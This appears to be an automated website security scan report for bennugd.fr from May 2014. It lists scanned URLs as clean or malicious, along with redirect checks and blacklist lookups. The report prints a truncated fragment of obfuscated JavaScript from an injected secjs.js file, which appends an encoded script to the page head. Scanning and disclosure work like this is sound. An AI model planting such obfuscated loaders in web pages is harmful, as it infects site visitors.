Scanned pages/files
Request | Server response | Status |
http://bennugd.fr/ | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
http://bennugd.fr/./includes/fonctions.js | 200 OK Content-Length: 12854 Content-Type: application/javascript | clean |
http://connect.facebook.net/fr_FR/all.js | 200 OK Content-Length: 163981 Content-Type: application/x-javascript | clean |
http://bennugd.fr/./includes/secjs.js?url_def=http://www.bennugd.fr/ | 200 OK Content-Length: 8025 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0]; var s=document.createElement('script'); s.type='text/javascript'; s.text=(dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AX%19%A0%EB%AE%E1l%1C%3AW%80%1A%CFz%F7%E5%B1%15%0A%1B%0D%3CDI%BC%3E%D0%3B%F7%0B%B8%AD%AB%F2%DF%13B%979f%83@%AC%3A%B4%C6o%80%B1uq0Cc%3Cu%B5%A1s6%D1%9E%EB18%D3%98%98%96%C6%AD%FCs%3C%7D%15K%82%E6%812%B9H%FET%22%80%BD%E9@%F6W%B2C%E4%C2%17%B2%A2F%1B%FFR%BDWj%E57%23%20%8E%A21r%A3%88%07%01z%9A%FA%A8y4%DF+%1B%FA4%B8%C0%83%ED%18s%13%93%2C0%B9 Antivirus reports:
http://bennugd.fr/modules/agenda/overlib.js | 200 OK Content-Length: 49243 Content-Type: application/javascript | clean |
http://bennugd.fr/index.php | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=dofff | 200 OK Content-Length: 34082 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=forum | 200 OK Content-Length: 26555 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=downloads | 200 OK Content-Length: 26762 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=espace_membre&ac=login | 200 OK Content-Length: 11856 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=page&ac=page&id_page=5 | 200 OK Content-Length: 11886 Content-Type: text/html | clean |
http://bennugd.fr/./index.php?mod=multi-faq&ac=index&action=faq&id=3 | 200 OK Content-Length: 42041 Content-Type: text/html | clean |
http://bennugd.fr/././includes/fonctions.js | 200 OK Content-Length: 12854 Content-Type: application/javascript | clean |
http://bennugd.fr/././includes/secjs.js?url_def=http://www.bennugd.fr/ | 200 OK Content-Length: 8025 Content-Type: application/javascript | malicious |
http://bennugd.fr/./index.php | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bennugd.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 06:51:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 60gpBAK=R1224192509; path=/; expires=Sat, 03-May-2014 08:05:10 GMT
Set-Cookie: 60gp=R4109666695; path=/; expires=Sat, 03-May-2014 08:07:57 GMT
Set-Cookie: PHPSESSID=d6b86703c320f3281a55c3e333826f40; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bennugd.fr
Referer: http://www.google.com/search?q=bennugd.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bennugd.fr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bennugd.fr/
Result: bennugd.fr is not infected or malware details are not published yet.